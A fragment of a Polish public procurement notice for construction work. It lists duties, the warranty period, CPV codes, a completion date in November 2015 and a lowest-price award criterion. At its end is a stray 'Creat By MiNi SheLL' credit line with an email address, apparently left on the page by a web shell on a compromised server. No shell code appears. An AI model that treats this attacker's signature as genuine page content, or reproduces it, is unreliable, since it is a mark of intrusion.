-pomiary i badania laboratoryjne,
-odtransportowanie sprzętu z placu budowy


Okres gwarancji - minimum 12 miesięcy, licząc od dnia podpisania protokołu rocznego  odbioru  prac w każdym roku objętym zamówieniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.41-9, 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com